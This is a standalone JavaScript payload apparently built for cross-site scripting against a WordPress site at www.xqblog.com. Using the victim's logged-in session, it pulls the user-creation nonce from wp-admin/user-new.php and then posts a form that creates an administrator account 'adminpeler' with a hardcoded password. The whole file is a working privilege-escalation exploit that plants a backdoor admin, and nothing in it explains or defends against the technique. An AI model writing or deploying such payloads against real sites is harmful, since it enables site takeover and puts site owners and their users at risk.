function getCSRFToken(url, csrf_token_id, func){ var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function(){ if(this.readyState == 4 && this.status == 200){ var parser = new DOMParser(); var htmlDocument = parser.parseFromString(this.responseText, "text/html"); var token = htmlDocument.getElementById(csrf_token_id).value; func(token); } }; xhr.open("GET", url, true); xhr.withCredentials = true; xhr.send(); } function addAdmin(token){ var xhr = new XMLHttpRequest(); xhr.open("POST","https://www.xqblog.com/wp-admin/user-new.php", true); xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=adminpeler&email=admin@peler.com&first_name=Peler&last_name=Peler&url=peler.com&pass1=Pelerlu123&pass2=Pelerlu123&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User"); } getCSRFToken("https://www.xqblog.com/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);